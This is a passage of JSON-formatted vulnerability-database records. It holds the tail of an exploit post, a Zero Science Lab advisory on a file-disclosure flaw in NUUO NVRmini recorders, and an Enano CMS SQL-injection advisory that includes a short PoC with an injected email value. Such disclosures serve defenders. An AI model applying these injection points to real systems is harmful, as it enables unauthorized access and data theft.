arrogantly. \r\nI recommend not to use this product for your own sake.\r\n\r\n---------------------------------------------------------------------------\r\nShoutz:\r\n~~~\r\n~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :) \r\n~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous\r\n~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama\r\n-------------------------------- [ EOF ]----------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/642"}], "zeroscience": [{"lastseen": "2019-03-23T16:16:54", "bulletinFamily": "exploit", "description": "Title: NUUO Local File Disclosure Vulnerability \nAdvisory ID: [ZSL-2016-5350](<ZSL-2016-5350.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Exposure of Sensitive Information \nRisk: (3/5) \nRelease Date: 06.08.2016 \n\n\n##### Summary\n\nNUUO NVRmini 2 is the lightweight, portable NVR solution with NAS functionality. Setup is simple and easy, with automatic port forwarding settings built in. NVRmini 2 supports POS integration, making this the perfect solution for small retail chain stores. NVRmini 2 also comes full equipped as a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping and RAID functions for data protection. Choose NVR and know that your valuable video data is safe, always. \n\n##### Description\n\nNUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script is not properly verified before being used to include files. This can be exploited to disclose contents of files from local resources. \n\n##### Vendor\n\nNUUO Inc. - <http://www.nuuo.com>\n\n##### Affected Version\n\n<=3.0.8 (NE-4160, NT-4040) \n\n##### Tested On\n\nGNU/Linux 3.0.8 (armv7l) \nGNU/Linux 2.6.31.8 (armv5tel) \nlighttpd/1.4.28 \nPHP/5.5.3 \n\n##### Vendor Status\n\n[14.01.2016] Vulnerability discovered. \n[01.02.2016] Vendor contacted. \n[02.02.2016] Vendor responds asking explanation. \n[03.02.2016] Explained to vendor about the issues and risk. \n[04.02.2016] Vendor ignores with confusion. \n[10.02.2016] Sent another e-mail probe to several accounts for respond. \n[16.02.2016] No response from the vendor. \n[16.04.2016] Final try to get communication from the vendor and report issues. \n[05.08.2016] No response from the vendor. \n[06.08.2016] Public security advisory released. \n\n##### PoC\n\n[nuuo_lfd.txt](<../../codes/nuuo_lfd.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/40211/> \n[2] <https://cxsecurity.com/issue/WLB-2016080065> \n[3] <https://packetstormsecurity.com/files/138222>\n\n##### Changelog\n\n[06.08.2016] - Initial release \n[09.08.2016] - Added reference [1], [2] and [3] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2016-08-06T00:00:00", "published": "2016-08-06T00:00:00", "id": "ZSL-2016-5350", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php", "title": "NUUO Local File Disclosure Vulnerability", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/nuuo_lfd.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "Vulnerability ID: HTB22709\r\nReference: http://www.htbridge.ch/advisory/sql_injection_in_enano_cms.html\r\nProduct: Enano CMS\r\nVendor: enanocms.org ( http://enanocms.org/ ) \r\nVulnerable Version: 1.1.7pl1\r\nVendor Notification: 16 November 2010 \r\nVulnerability Type: SQL Injection\r\nStatus: Fixed by Vendor\r\nRisk level: High \r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in email variable.\r\nAttacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.\r\n\r\nThe following PoC is available:\r\n\r\nStep1.\r\nRegister new user with email: "any@email.com'SQL_CODE"\r\n\r\nStep2.\r\nLog in with new login and password.\r\nSolution: Upgrade to the most recent version", "modified": "2010-12-01T00:00:00", "published": "2010-12-01T00:00:00", "id": "SECURITYVULNS:DOC:25218", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25218", "title": "SQL Injection in Enano CMS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2010-12-01T00:00:00", "published": "2010-12-01T00:00:00", "id": "SECURITYVULNS:VULN:11274", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11274", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
